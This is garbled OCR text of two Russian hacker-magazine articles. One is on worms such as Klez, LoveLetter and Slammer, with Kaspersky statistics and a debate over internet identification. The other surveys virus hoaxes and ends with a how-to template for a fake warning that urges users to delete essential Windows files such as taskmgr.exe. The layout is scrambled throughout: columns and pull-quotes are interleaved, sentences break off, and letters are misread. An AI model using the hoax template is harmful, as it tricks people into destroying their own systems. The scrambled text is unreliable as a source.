мания привлек к себе уйму. Автор 
этого творения, чтобы заставить 
пользователя открыть зараженный 
файл, писал в теме письма "| Love 
You!". Какой человек удержится от 
соблазна прочесть любовное письмо 


терный мир взял на вооружение но- 
вую заразу. Теперь, чтобы остано- 
вить наступление, используется ра- 
кета с ядерным боезарядом. Она не- 
сет в себе смерть: взрывную волну, 
радиацию, высочайшую температу- 
ру, магнитный импульс. Смерть для 
всего живого и техники. Точно так 
же и новый червь - он сам залезет 
на компьютер, ему не нужен пользо- 
ватель, который по своей глупости и 


1/3 bb bh 


Сетевой. червь Melting 


наивности запустит инфицирован- 
ный cpaun. 

Помнишь Klez? Конечно, помнишь. Я 
просто не могу обойти его стороной. 
Этот червь-легенда заразил за свою 
жизнь сотни тысяч компьютеров. Что 
ему было нужно? Только уязвимое 
программное обеспечение в лице 
Outlook и Internet Explorer. И не стоит 
думать, что виноваты во всем ребята 
из Microsoft, напротив, они заблагов- 
ременно выпустили необходимый 
патч. Нельзя во всем винить и поль- 
зователей - ну, забыли некоторые ус- 
тановить hot-fix или сервис-пак. Ни- 
чего не поделаешь. Жизнь такая. На- 
метанный глаз сразу углядит - проб- 
лема в другом: сама технология 
"червь+дыра" позволяет таким вот 
монстрам безнаказанно распростра- 
няться по всему миру. Червь запус- 
кается при щелчке пользователя на 
самом письме в Outlook. Казалось 
бы, всего ничего, а компьютер уже 
под властью пришельца. 

Но смерть интернета путем зараже- 
ния всех или подавляющего боль- 
шинства компьютеров - это не 
единственное, чего все боятся. По- 
мимо таких общих вопросов, как 
"интернет упадет", есть более на- 
сущные проблемы бизнеса. Бизнес 
сейчас контралируют страны, прес- 
су, образование и т.д. Интересы 
бизнеса - это то, что заботит силь- 
ных мира сего куда больше миро- 
вых проблем. Поверь, никто и не 
заметил бы, как разбомбили Ирак, 
если бы не арабская нефть. Своя 
рубашка ближе к телу. Казалось 


Вирусы в e-mail. По данным MessageLabs 


бы, как это все 
связано с чер- 
вями? Компа- 
нии терпят ог- 
ромные убытки 
из-за простоя 
ПК, потери 
нужной инфор- 
мации и необ- 
ходимости вос- 
становления 
множества ма- 
шин. Не стоит 
забывать, что 
подавляющее 
большинство 
офисных сот- 
рудников не 
сильно разби- 
раются в виру- 
сах, червях и 
прочей заразе. 
Их стоит защи- 
щать даже от 
обычных червя- 
ков с надписью 
"Запусти меня!" 
А тутеще и са- 
мозапускаю- 
щийся гад поя- 
Bunca... Еще раз 
напомню о 
LoveLetter, ко- 


вреда он не причинил. Во-первых, у 
нас было не очень много компаний 
с большим количеством компьюте- 
ров. Их и сейчас немного, но 3 года 
назад было еще меньше. Во-вто- 
рых, большинство российских ком- 
паний используют Антивирус Кас- 
перского, который изначально да- 
вал иммунитет к LoveLetter. Инте- 
ресно, что ребята из "Лаборатории 
Касперского" предсказали появле- 
ние LoveLetter еще за год или два 
до реальных событий. Конечно, они 
не знали, что тело вируса будет лю- 
бовным письмом, но предугадали 
технологию, которую вирус исполь- 
зовал для заражения компьютера. 
Как часто бывает, никто им не по- 
верил. Но наши парни реализовали 
эвристическую защиту от гадов та- 
кого типа в модуле под названием 
ScriptChecker (он входит в состав 
любого дистрибутива Антивируса 
Касперского). В результате, когда 
LoveLetter добрался go Hac, ни 
один клиент "Лаборатории" так с 
этим червем и не познакомился. 
Это хороший эпизод из истории 
борьбы с червями. Но плохих эпизо- 
дов больше. Во сколько обходится 
простой серверов, на которых раз- 
мещается сетевой магазин, или 
простой компьютеров в банке? Это 


Интересно, что ребята из 
"Лаборатории Касперского" предсказали 
появление LoveLetter еще за год или 
два gO реальных событий. 


торый за месяц своей жизни в 
2000 году нанес мировой экономи- 
ке урон в 8,75 млрд. долларов (по 
данным "Лаборатории Касперско- 
го"). Нам, правда, в России особого 


Исполняемый вирус Ната 


астрономические суммы. И никому 
не хочется их терять только потому, 
что какой-то шалун написал малень- 
кую программку, которая ставит на 
колени целые сети. 


Какой чело- 
век удер- 
жится от 
соблазна 
прочесть 
любовное 
письмо от 
своего кол- 
леги? Это 
психология. 
Психология 
прошлого. 
Сегодня она 
никому не 
нужна. 


В том-то и 
дело, что 
проблема 
"пользова- 
теля, кото- 
рому надо 
что-то впа- 
ривать"" 
уже сошла 
на нет. 


Проблема 
интернета 
не только в 


червях. 
Черви - 
лишь вер- 
шина айс- 
берга. Под 
водой же 
скрывается 
огромная 
часть под 
названием 
спам. Сле- 
дует отме- 
тить, что за 
последний 
месяц все- 
мирно изве- 
стная ана- 
литическая 
компания 
MessageLab 
$ зафикси- 
ровала объ- 
ем спама, 
больший, 
чем за весь 
2002 год. 
Неплохие 
темпы, да? 


СЪЕДЯТ ЛИ ЧЕРВИ ИНТЕРНЕТ? 


Скрипт для Corel Draw под названием Gala 


Мы разобрались в мотивах, заставля- 
ющих людей бояться "конца вирту- 
ального света". Посмотрим, насколь- 
ко реально создание червя, которому 
это под силу. Прежде всего, червь 
должен уметь быстро размножаться. 
Но речь пойдет не о банальном поис- 
ке адресов в адресной книге пользо- 
вателя. Нет, разговор будет о спаме. 
С недавнего времени вирусописатели 
стали использовать спам-технологии, 
чтобы повысить скорость распрост- 
ранения вирусов в сотни и даже ты- 
сячи раз. Ведь огромная база e-mail 
адресов - это то, чего так долго не 
хватало червям! Почтовый адрес - 
это та маленькая дырочка в большом 
яблоке, через которую можно влезть 
внутрь. Результатом такого подхода 
является чрезвычайно быстрый старт 
эпидемии, когда миллионы пользова- 
телей по всему миру получают инфи- 
цированные письма. 

Далее, червь должен уметь заражать 
компьютер пользователя без вмеша- 
тельства человека. Для этого и слу- 
жат дыры в ПО. Уже сегодня сущест- 
вует много дыр в самых разных прог- 
раммах. Многие из этих дыр уже дав- 
но пропатчены и забыты. Но ведь 
есть бреши, которые еще никто не 
нашел! А найти их вполне реально, 
достаточно посмотреть ежедневные 
сводки: что-нибудь да найдут. Итак, и 
это не проблема для червя. А больше 
ему ничего и не надо. 

Можно вкратце резюмировать: созда- 
ние червя, эксплуатирующего новую 
брешь в системе безопасности и 
распространяющегося очень быстро, 
вполне реально. Здесь мы рассмотре- 
ли лишь стандартную составляющую 
сущности червя, а ведь можно доба- 
вить и обычные вирусные свойства. 
За последние три года мы увидели та- 
кие технологии, о которых раньше не 
могли и помыслить. Сегодня есть ви- 
русы, необычайно маленькие, мо- 
дульные (скачивающие свои апдейты 
из интернета), шифрующие себя 
мощными криптографическими cpeg- 
ствами, чрезвычайно деструктивные 
(портящие все тот же СМО5) и т.п. Бо- 
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лее того, все эти функции уже так 
или иначе реализованы в разных 
червях. Так что мешает соединить их 
в одном? 

Итак, теоретически появление супер- 
червя вполне возможно. Почему же 
он до сих пор не создан? Разрабо- 
тать все модули такого гада одному 
человеку сложно. Ему нужно быть и 
очень хорошим программистом, и 
уметь отыскивать свежие баги в по- 
пулярном сосфте, нужно знать ассе- 
мблер и иметь богатый опыт работы с 
дизассемблером. Так что же, таких 
людей нет? Дело, видимо, в том, что 
людям, способным создать такого 
червя (а такие люди, разумеется, 
есть), к счастью, хватает ума зани- 
маться более конструктивными веща- 
ми. По большей части распростране- 
нием вирусов занимаются закомплек- 
сованные подростки, мечтающие до- 
казать всему миру свою крутость. Но, 
помимо немереных амбиций, нужны 
ведь еще и знания... 


ЧЕРВЯК . 
НЕОБЫКНОВЕННЫЙ 

и Теперь мы поговорим о продвину- 
тых червях. Червях, у которых нет те- 
ла. Правда, это куда более интерес- 
но? Эти паразиты существуют в виде 
пакетов, передаваемых по Сети. При 
попадании на компьютер такой гад 
находится лишь в его оперативной 
памяти! На мой взгляд, это венец эво- 


жен брать пакетный фильтр. Ведь 
бестелесный код представляет собой 
набор пакетов, значит, и фильтро- 
ваться должен брандмауэром или се- 


Хороший пример объединения 


антивируса (Касперского) и 


брандмауэра (Check Point Firewall) 


тевым экраном. Мы пришли к хорошо 
известной "борьбе снаряда и брони". 
После появления первого бестелес- 

ного червя - CodeRed - разработчики, 
да и все остальные, предпочли прос- 
то заделать дыру в уязвимом ПО. А 

вот после недавнего зимнего нашест- 


Итак, теоретически появление 
суперчервя вполне возможно. 
Почему же он gO сих пор не создан? 


люции сетевых 


червей. 

Так почему та- 
кие черви столь 
опасны? А по- 
тому, что анти- 
вирус против 
них бессилен. 
Дело в том, что 
любой антиви- 
рус может про- 
верять лишь 
файлы. Если 
вредоносный 
код не заража- 
ет файлы, то 
сканер, мони- 
тор, ревизор из- 
менений и по- 
веденческий 
блокиратор от- 
дыхают. Это все 
равно, что в 
Нео из пистоле- 
та палить. 

Ну хорошо, ес- 
ли антивирус не 
берет, то дол- 


Интернет. 
2,30% 


Мобильные накопители 
13% 


Электронная почта 96,40% 


Основные источники вирусной угрозы в 2002 году. По данным 
"Лаборатории Касперского" 


Другие 
0,3% 


Скрипт-вирусы 
2D 


Windows-sBupycbl 
40,9% 


Макро-вирусы 
561% 


Самые распространенные в 2002 году типы компьютерных 
вирусов (черви и троянцы сюда не относятся). По данным 


"Лаборатории Касперского" 


Другие 
9 
gee back door- 
программы 
54% 


РУ\М/-программы 
17,9% 


Самые распространенные в 2002 году типы троянских программ. 


По данным "Лаборатории Касперского" 


18 С-черви 


Р2Р-черви 02% 


Почтовые черви 
95,6% 


Самые распространенные в 2002 году типы сетевых червей. По 


данным "Лаборатории Касперского" 


близкая к проб- 
лемам брандма- 
уэров, а не ан- 
тивирусов. Могу 
лишь сказать, 
что у нового 
бестелесного 
червя шансы 
проскочить та- 
кой фильтр не- 
замеченным 
очень высоки. 
Что меня так 
привлекло в 
этих бестелес- 
ных червях? 
Во-первых, их 
необычайная 
скорость расп- 
ространения. 
Ты, наверное, и 
сам понима- 
ешь, что пере- 
дать неболь- 
шой объем па- 
кетов проще, 
чем 130 кило- 
байт (пример- 
ный размер 
Klez). К тому 
же, как только 
червь типа 
Slammer попа- 
дет на компью- 
тер-жертву, он 
сразу начнет 
генерировать 
непрерывный 
поток трабрика, 
направленный 
именно на за- 
ражение дру- 
гих ПК. То есть 
такому червю 
вовсе не нуж- 
но, чтобы его 
кто-то запускал 
и открывал - он 
распространя- 
ется без помо- 
щи людей и де- 
лает это намно- 
го быстрее лю- 
бого другого 
червя, даже ес- 


Теперь поставим следующий вопрос. 
Может ли бестелесный червь поставить 


на колени всю Сеть? 


Может, но лишь теоретически. 


вия Slammer специалисты задума- 
лись не на шутку. Сегодня в больши- 
нство корпоративных брандмауэров 
встроены специальные средства, ко- 
торые фильтруют трафик на уровне 
пакетов и следят за "вредонос- 
ностью" кода. Как происходит анализ 
- тема отдельного разговора, более 


ли тот использует спам-технологии. 
Идем дальше. Последний бестелес- 
ный червь показал потрясающие ре- 
зультаты - он заразил примерно чет- 
верть интернета всего за пару дней. 
Это значит, что каждый четвертый 
сайт был недоступен. Интересна са- 
ма сущность Slammer: он поражал 


лишь сервера, использующие MS 
SQL Server. То есть домашним поль- 
зователям он никакого вреда причи- 
нить бы не смог. Но направленность 
на серверный сегмент Сети свиде- 
тельствует о том, что автор ставил 
перед собой задачи, вполне достой- 
ные злого гения (или просто не на- 
шел другую дыру в ПО, которую 
можно эксплуатировать для распро- 
странения червя - прим. peg.). OH 
мечтал положить интернет на лопат- 
ки. Это у него почти получилось. На 
одну четверть. Slammer показал 
всему миру, как должен себя вести 
настоящий червяк. 

Теперь поставим следующий воп- 
рос. Может ли бестелесный червь 
поставить на колени всю Сеть? Мо- 
жет, но лишь теоретически. Правда, 
если мощный бестелесный червь 
все-таки будет создан, угроза "обг- 
лоданного интернета" станет более 
чем реальной. 

Потенциал бестелесного червя нам- 
ного выше, чем обычного файлового. 
Но создать червя-призрака еще 
сложнее, чем мощного экземпляра, 
типа Klez. Так что черви - не угроза 
будущему. 


ЯЩИК ПАНДОРЫ 

и Проблема интернета не только в 
червях. Черви - лишь вершина айс- 
берга. Под водой же скрывается ог- 
ромная часть под названием спам. 
Следует отметить, что за последний 
месяц всемирно известная аналити- 
ческая компания MessageLabs за- 
фиксировала объем спама, боль- 
ший, чем за весь 2002 год. Непло- 
хие темпы, да? 
Ключей к интернету два: серверы и 
трафик. Уничтожить интернет можно 
двумя способами: повредить/зара- 
зить серверы или создать повсемест- 
ный избыточный траффик. Первое до- 
вольно проблематично, а второе 
вполне реально. Slammer, благодаря 
генерируемому трасфику, вывел из 
строя четверть Глобальной Сети. А 
спам и файловые черви создают go- 
полнительный избыточный трафик 
плюс финансовые потери для бизне- 
са и домашних пользователей. Вот 
где корень зла. 
Но можно взглянуть на проблему 
шире. Чем крупнее система, тем 
сложнее ее проблемы. Вот три сла- 
бых места интернета: безнаказан- 
ность, полное отсутствие контроля и 
отсутствие международных законов 
и международных органов надзора. 
Если обобщить, то получится такая 
картина: любой человек может де- 
лать в Сети все, что захочет (закон- 
ное и незаконное), и его будет очень 
сложно отыскать, а даже если это 
удастся, то наказать его будет нелег- 
ко (не везде есть подходящая право- 
вая и исполнительная базы). 
Что же делать? Многие антивирус- 
ные эксперты во главе с Евгением 


Касперским предлагают ввести систе- » 


Так почему 
такие черви 
столь опас- 
ны? А пото- 
му, что ан- 
тивирус 
против них 
бессилен. 
Дело в том, 
что любой 
антивирус 
может про- 
верять 
лишь фай- 
лы. Если 
вредонос- 
ный код не 
заражает 
файлы, то 
сканер, мо- 
нитор, ре- 
визор изме- 
нений и по- 
веденческий 
блокиратор 
отдыхают. 
Это все 
равно, что в 
Нео из пис- 
толета па- 
лить. 


Tenepb noc- 
тавим сле- 
дующий 
вопрос. Мо- 
жет ли бес- 
телесный 
червь пос- 
тавить на 
колени всю 
Сеть? Мо- 
жет, но 
лишь тео- 
ретически. 


С недавнего 
времени ви- 
русописате- 
ли стали 


использо- 
вать спам- 
технологии, 
чтобы по- 
высить ско- 
рость расп- 
ространения 
вирусов в 
сотни и да- 
же тысячи 
раз. Ведь 
огромная 
база e-mail 
адресов - 
это то, чего 
так долго 
не хватало 
червям! 


СЬЕДЯТ ЛИ ЧЕРВИ ИНТЕРНЕТ? | 


Троянские 
программы 
39% \ 


Сетевые черви 
891% 


Типы вредоносных программ в 2002 году. По данным 


"Лаборатории Касперского" 


Динамика распространенности типов вредоносных программ в 
2002 году. По данным "Лаборатории Касперского" 


Динамика распространенности вредоносных программ в 2002 
году. По данным "Лаборатории Касперского" 


это тема для 
разговора. 

По мнению Евге- 
ния Касперского, 
корень зла - ца- 
рящая анархия и 
безнаказан- 
ность. В интерне- 
те нет никаких 
законов. Если бы 
то же самое бы- 
ло в реале, то 
любой даун мог 
бы разбить вит- 
рину или помять 
крыло машины 
соседа. И никто 
бы его за это не 
наказал. В ин- 
тернете сейчас 
именно такая си- 
туация - пользо- 
ватель не несет 
никакой ответ- 
ственности за 
свое хулиган- 
ство (вирусопи- 
сательство, рас- 
сылку спама). 
Сегодня количе- 
ство вредонос- 
ной информации 
стремительно 
приближается к 
количеству по- 
лезной. Если эта 
тенденция сох- 
ранится, то од- 
нажды в интер- 
нете просто не- 
чего будет де- 
лать - открыва- 
ешь почтовый 
ящик, а там Ha 1 
полезное пись- 
мо 99 вирусов и 
спама. Именно 
для предотвра- 
щения этого 
предлагается 
ввести правила, 
регламентирую- 
щие работу с 
Сетью. Прежде 
всего, персо- 
нальный иденти- 
фикационный 
код. Его суть 


Вирусы 
7,0% 


Чем сложнее объект, тем большую угрозу 
его размер представляет для него самого. 
Чтобы этого не произошло с интернетом, 
нужно вводить правила игры. 


му уникальных идентификационных 
номеров и создать правовую и ис- 
полнительную базы. Вторая часть 
этого предложения нас не касается - 
мы не юристы. А вот уникальные О - 
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примерно следующая: заходишь в 
Сеть, будь добр предъявить "права" и 
соблюдать "правила движения". Так 
можно без труда вычислить, кто и ког- 
да запустил очередной вирус или ра- 


зослал тонны спама. Естественно, 
полностью искоренить киберпреступ- 
ность не удастся никогда, но этот шаг 
даст возможность значительно ее 
сократить. 

Теперь любопытно обсудить проб- 
лему приватности: ведь не все мы 
преступники. В идеале, идентифи- 
кационный код - это универсаль- 
ный сетевой паспорт, который при- 
нимается по всему миру, всеми 
провайдерами (как, например, кре- 
дитная карточка Master Card или 
Visa). При работе с интернетом 
пользователь предъявляет его, и 
с этого момента провайдер начи- 
нает вести отчет о действиях. Вот 
тут-то и загвоздка - можно смело 
привести контрдовод - попытка 
нарушить священную privacy при 
работе с Сетью. Если снова обра- 
титься к реальной жизни, то на 
автодорогах есть правила движе- 
ния, права, технические паспорта, 
проверки, а при пересечении гра- 
ницы есть таможенный и паспорт- 
ный контроль. Можно привести 
еще кучу аналогичных примеров. 
Люди согласились на компромисс 
между бардаком, анархией и упо- 
рядоченностью, процессуаль- 
ностью. Чем сложнее объект, тем 
большую угрозу его размер 
представляет для него самого. 
Чтобы этого не произошло с ин- 
тернетом, нужно вводить правила 
игры. Это единственный выход. 
Так рассуждает Касперский. 
Однако, все эти доводы можно оспо- 
рить. Сейчас у каждого гражданина 
РФ есть паспорт и, более того, про- 
писка или регистрация. Но снижения 
роста преступности нет и не предви- 
дится. Дополнительные заморочки 
вроде московской регистрации, явля- 
ясь по сути абсолютно безполезны- 
ми, превратились в средства получе- 
ния взяток чиновниками и левых GO- 
ходов мелкими мошенниками. А нас 
как взрывали - так и продолжают 
взрывать. 

Тут дело не в законах, а в состоянии 
общества, в том, что у нас в головах 
творится. Ведь если бы «большин- 
ство» не хотело сделовать букве за- 
кона - никто бы их законы не выпол- 
нял (за примерами долго ходить на 
надо). Поэтому думать надо не о то- 
тальной слежке и идентификации 
всех граждан и пользователей Сети, 
а о повышении уровня их культуры, 
образования и нравственых ценнос- 
тей. Если каждый будет действовать 
по принципу "поступай по одноше- 
нию к другому так, как бы ты хотел, 
чтобы он поступал по отношению к 
тебе", мы будем жить в мире и сог- 
ласии. 

Буду рад обсудить эту тему в форуме 
на www.xakep.ru! aL 
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КАК ПОСЕЯТЬ ПАНИКУ В ИНТЕРНЕТЕ | 


Александр Алексеев aka Shen (_shen_@mail.ru), http://code.e-forums.ru 


КАК ПОСЕЯТЬ 
ПАНИКУ В ИНТЕРНЕТЕ 


"Здравствуйте, Вы 


только что получили 


по почте интернет-ви- 


рус "Талибан", но так 

как мы в Афганистане 
не сильно продвинуты в высоких тех- 
нологиях, вам следует исполнить этот 
вирус вручную: 1) пожалуйста, разош- 
лите вирус всем своим знакомым и 
друзьям; 2) удалите все файлы из 
папки c:\windows". 


Слышал такую шутку? Даже видел в 
своем ящике? А ты в курсе, что, ис- 
пользуя похожий прием, можно уст- 
роить в Сети такую панику, что не 
снилась даже именитым возмутите- 
nam спокойствия, вроде Кей и 
SirCam? Не в курсе? Тогда читай. 


"Здрав- 
ствуйте, Вы 
только что 
получили по 


СМЕРТЬ МОБИЛАМ! 
m= "Если вам позвонили и на дисплее 
вашего мобильного телефона высве- 


ВСЕ О ВИРУСНЫХ МИСТИФИКАЦИЯХ 


ки, что сделает ваш телесфон неспо- 
собным связываться с телефонной 
сетью. Вам придется покупать новый 
телефон. Эту информацию подтвер- 
дили фирмы Моторола и Нокиа. Уже 3 
миллиона мобильных телефонов за- 
ражены этим вирусом в США. Эти све- 
дения вы также можете проверить на 
сайте СММ. Пожалуйста, сообщите эту 
информацию всем друзьям". 


Такое сообщение появилось Ha од- 
ном из форумов интернета в октябре 
2002. Через час на этом форуме уже 
шла жаркая дискуссия о борьбе со 
страшным вирусом, а через несколь- 
ко суток каналы крупнейших е-тай 
провайдеров были переполнены по- 
добными письмами-предупреждения- 
ми - тысячи пользователей Сети то- 
ропились предостеречь друзей и зна- 


телями телефонов раскрутили на де- 
тальки пару десятков мобильников :), 
во всем разобрались и вывесили на 
своих сайтах опровержения в духе 
"Все ништяк, живите дальше". Но та- 
кой мирный исход мистификации име- 
ют не всегда. 


SULFNBK.EXE - УБИЙЦА 
ОТ МАЙКРОСОФТ 

и Знаешь, что общего между дра- 
кой, сходом лавины и вирусной мис- 
тификацией? Во-первых, все это ин- 
тересно наблюдать только со сторо- 
ны. А во-вторых, и то, и другое, и 
третье можно спровоцировать неос- 
торожно сказанным словом. 


Чаще всего в основе слухов, из кото- 
рых впоследствии вырастают вирус- 
ные мистификации, лежат вполне 


Один участливый юзер предупредил 
другого, тот - своих знакомых, 
и пошло-поехало. 


ета чивается АСЕ-?, не отвечайте на этот 
рус "Тали- звонок, сразу прекратите. Если вы от- 
Gan". ветите на звонок, TO ваш телефон бу- 
дет заражен этим вирусом. Вирус сот- 
рет всю информацию IME! и IMSI с Ba- 
шего телесфона и с вашей 5!М-карточ- 
Люби rhe LEI 
пы, их мож- 
а. Впоследствии ВЫЯСНИЛОСЬ, 
6 ia < 
И что этот файл всего-навсего 


потому, что 
они хотят в 
нее верить, 
либо пото- 
му, что бо- 
ятся, что 
она окажет- 
ся прав- 
gon". 


Все, можно выкидывать :) 
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стандартная утилита Виндовс 


комых от опасности. Сообщалось, что 
вирус может попасть на мобильник 
не только через звонок, но и через 
$М5-сообщение, что вирус выводит 
телесроны из строя мгновенно и без- 
возвратно, а также прочая чушь. По- 
чему я говорю "чушь"? А потому, что 
не было никакого вируса. Ну, не было 
и все. Газетчики назвали бы случив- 
шееся уткой, но у нас, людей цифро- 
вого века, есть собственное название 
для этого - вирусная мистификация. 


Случай с вирусом для сотовых закон- 
чился довольно безобидно - антиви- 
русные компании вместе с производи- 


благие намерения. Но ты ведь пом- 
нишь, куда ведет вымощенная ими 
(намерениями) дорога. Один участли- 
вый юзер предупредил другого, тот - 
своих знакомых, и пошло-поехало. 
Известны и другие варианты, когда в 
основе дезинформации действитель- 
но лежит реальный вирус. Такова, 
например, нашумевшая история с 
файлом sulfnbk.exe. Если у тебя 
Win9x, загляни в каталог 
%windir%\command, и ты найдешь 
там этот файл. Человека, пустившего 
слух в Сеть, насторожили три вещи: 
sulfnbk.exe антивирус определял как 
зараженный, файл имел странные 
иконку (посмотри сам) и название (я 
тоже как-то не доверяю сфайлам, ти- 
па ds7afw2q.exe). Впоследствии вы- 
яснилось, что этот дайл всего-навсе- 
го стандартная утилита Виндовс, а 
имя расшифровывается как System 
Utility for Long FileName Backup (сис- 
темная утилита для резервного копи- 


рования фалов с длинными имена- 
ми). Просто этот файл на компьюте- 
ре инициатора суматохи действи- 
тельно был заражен вирусом, а вер- 
нее, червем под названием Magistr - 
одним из самых распространенных и 
опасных в то время. Похожая история 
произошла также с "вирусом" jdbgm- 
gr.exe, который доброжелатели сове- 
товали удалить как можно скорее, и 
который оказался безобидной частью 


скоростью. Причин тому было две: от- 
сутствие общедоступных глобальных 
сетей и то, что люди, сидевшие 3a Te- 
ми немногими терминалами, что все- 
таки были подключены к сети, имели 
уровень технической подготовки, за- 
метно превышающий уровень Cpeg- 
нестатистического пользователя 
дней нынешних. С приходом массо- 
вых сервисов, вроде America Online, 
ситуация резко изменилась, и в 1994 


Для того чтобы стать жертвой вируса, доста- 
точно было прочитать письмо со словами 
Good Times в заголовке. Стоит ли говорить, 
что никакого вируса не было и в помине? 


пакета Visual J++. И снова экземпляр 
jdbgmgr.exe на компьютере, который 
первым поднял тревогу, был на самом 
деле заражен вирусом. Кстати, через 
некоторое время после первого появ- 
ления ложных сообщений о вирусе 
}Чбатог.ехе, в Сети действительно по- 
явился червь с таким названием (так- 
же известный Kak Recory). 


КАК ВСЕ НАЧИНАЛОСЬ 
Вирусные мистификации как яв- 
ление были отмечены еще в конце 
80-х, но тогда подобные провокации 
не представляли особой угрозы и не 
распространялись с сегодняшней 


АНТИВИРУСНЫЙ МАНУАЛ ОТ РОБЕРТА МОРРИС. 


году среди пользователей AOL поя- 
вился слух о вирусе Good Times, ко- 
торый, "по сведениям из достовер- 
ных источников", безвозвратно унич- 
тожал всю информацию, хранящую- 
ся на компьютере. Для того чтобы 
стать жертвой вируса, достаточно 
было прочитать письмо со словами 
Good Times в заголовке. Стоит ли го- 
ворить, что никакого вируса не было 
и в помине? Надо отметить, что 
вклад, внесенный пользователями 
AOL в развитие многих мистисфика- 
ций, трудно переоценить :). Bnocneg- 
ствии попытки вызвать в Сети круп- 
ную панику, используя вирусные 
мистификации, предпринимались 
много раз, но далеко не все из них 
оканчивались успехом. И по сей день 
редкий месяц проходит без сообще- 
ний о "самом опасном вирусе в исто- 
рии, который может уничтожить ваш 
компьютер в считанные секунды". 


САМЫЙ ПОПУЛЯРНЫЙ 


Ш Конечно же, в этой катего- 
рии лидирует |-Worm.Klez. 
Этот червячок тусуется в Сети 
уже довольно давно, регуляр- 
но посещая и мой мыльник. 
Видимо, популярность обош- 
лась ему дорого, поскольку 
некоторые издания начали на- 
зывать его и "самым деструк- 
тивным". Действительно, по 13 
числам четных месяцев он 
любит портить все найденные 
файлы, записывая в них слу- 
чайное содержимое, но разве 
это деструкция? Это они еще 
деструкции не видели :). Прав- 
да, суммарный ущерб от этого 
вируса составил 9 млрд. дол- 
ларов. Видимо, это связано с 
тем, что для распростране- 
ния он использует дыру в 
IFrame (запускаясь при 
просмотре сообщения), а 
каждая отосланная копия 
вируса содержит все элект- 
ронные адреса, стыренные с 
предыдущей машины. 


САМЫЙ ДЕСТРУКТИВНЫЙ 


Ш Однозначно это - Win.CIH, 
прозванный также чернобы- 
лем. Творение образца 98 го- 
да живет до сих пор, исправ- 
но заражая любителей игро- 
вого вареза. Дело в том, что в 
России этот вирь появился в 
виде зараженной копии 
Dune2000 и некоторых gpy- 
гих игр. Вирус (длиной 1Кб) 
заражает РЕ файлы, перехва- 
тывая обращения к ним при 
открытии. Самым деструктив- 
ным его можно обозвать по- 
тому, что 26 апреля он с удо- 
вольствием чистил диски 
пользователей и портил flash- 
биос на некоторых платах 
(особенно на которых запись 
была разрешена по умолча- 
нию). Полмиллиона людей по 
всему миру выкинули свои 
мамки на помойку именно из- 
за Чиха, который так и остал- 
ся единственным вирусом, ре- 
ально портящим железо. 


Лозовский Александр 
(alexander@real.xakep.ru) 


Bcerga Begb 
удобнее gy- 
MaTb, 4TO 
компьютер 
не работает 
не из-за 
собствен- 
ных кривых 
рук, а из-за 
"таинствен- 
ного вируса, 
написанного 
на языке 
Ассемблера 
для IBM 
РС". 


КАК ПОСЕЯТЬ ПАНИКУ В ИНТЕРНЕТЕ | 


КОГДА СЛОВО - ОРУЖИЕ 

и Бывают также и случаи, когда 
мистификация создается, что называ- 
ется в здравом уме и трезвой памяти, 
преследуя вполне конкретные цели. 
Ты спросишь, зачем? Ведь толку OT 
такой дезы никакого, вреда тоже ма- 
ло, это ж не вирусы, где и многомил- 
лионные убытки, и выведенные из 
строя компьютеры. Но давай-ка прис- 
мотримся к этому "явлению" повнима- 
тельней. Интернет, находящийся во 
власти очередной вирусной мистифи- 
кации, мне больше всего напоминает 
муравейник, в который воткнули ло- 
пату: усердные юзеры спешат npegyn- 
редить друг друга об опасности, обме- 
ниваются методами борьбы с виру- 
сом, городская АТС перегружена 
звонками в службы поддержки, а ag- 
мины почтовых серверов тихонько 
офригевают, глядя на размер трафика. 
А теперь подумай, какое влияние мо- 
жет оказать сообщение о вирусе, ко- 
торый выводит из строя мобильники 
фирмы Нокиа, на репутацию этой са- 
мой Нокии. И тогда ты поймешь, поче- 
му для этой пакости придумали краси- 
вое название "вирусная мистисфика- 
ция", почему ни один учебный курс по 
защите информации не обходится 


САМЫЕ ПРАВДОПОДОБНЫЕ ПРЕДУПРЕЖДЕНИЯ :) 


Ш А. 1.0.5. 

Сообщаем вам о существовании вируса А.1.0.5. Этот вирус, проник- 
нув внутрь компьютера, уничтожает вашу память. Эта память не 
подлежит замене. Покончив с памятью, он заражает мышь или дру- 
гое устройство ввода. Затем вирус инфицирует клавиатуру, и бук- 
вы, которые вы нажимаете, не будут отображаться на экране. Пе- 
ред самоликвидацией вирус уничтожит 5 мегабайт на вашем жест- 
ком диске и удалит все программы на нем. 

ш Death Рау. 

Новый смертоносный вирус действительно заставляет компьютеры 
взрываться. С 15 августа от осколков и огня уже пострадало, по 
меньшей мере, 47 человек. Миллионы людей рискуют получить 
травму, ослепнуть или даже погибнуть каждый раз, когда садятся 
за свои компьютеры! "Вирусы прошлого могли вывести из строя 
ваш компьютер, но этот вирус пошел дальше - он может убить 
вас", - заявил Мартин Хериден, специалист по компьютерным виру- 
сам. "У этого вируса нет традиционных "маркеров", по которым его 
можно обнаружить. Он проникает сквозь любые щели. Это крайне 
сложный процесс. Могу сказать, что вирус влияет на компьютерное 
оборудование, создавая условия, приводящие к опасным коротким 
замыканиям. Конечный результат? Взрывы, мощнейшие взрывы. 


Миллионы пользователей интернета в опасности". 


Админы почтовых серверов 
тихонько офигевают, 
глядя на размер трафика 


без этой темы и почему каждая круп- 
ная антивирусная компания тщатель- 
но следит за появлением подобных 
"предупреждений" и прикладывает 
все силы, чтобы пресечь распростра- 
нение слуха до того, как он наберет 
обороты. Но этим деструктивный ха- 
рактер мистификаций не исчерпыва- 
ется: есть еще, как минимум, два спо- 
соба превратить безобидную, каза- 
лось бы, шутку в серьезную угрозу. 


ПЕРВОЕ ПРАВИЛО 
ВОЛШЕБНИКА 

m Итак, способ номер один, самый 
распространенный. Выбирается срайл, 
без которого нормальная работа сис- 
темы невозможна или затруднена, и 
рассылается письмо вида: "Achtung!" 
По сообщениям сайтов 
www.microsoft.com И www.virusi.new- 
mail.ru, интернет захлестнула эпиде- 
мия новой модификации вируса 
WIN95.CIH, которая не определяется 
антивирусными программами! Если на 
вашем компьютере в папке c:\win- 
dows\ есть файл taskmgr.exe - вы 
УЖЕ стали жертвой эпидемии! Един- 
ственный способ избавится от вируса 
- удалить его вручную. Для этого вы- 
полните следующие шаги: найдите 
указанный сфайл на вашем компьюте- 
ре (Пуск->Найти) и удалите его, ygep- 
живая клавишу Shift (в OC Windows). 
Не забудьте предупредить своих зна- 
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комых и друзей!" Все, процесс пошел. 
Доверчивые юзеры, дважды перечи- 
тав письмо, чтобы ничего не упустить, 
начнут с умным видом удалять файлы 
типа kernel32.dll, вот только разослать 
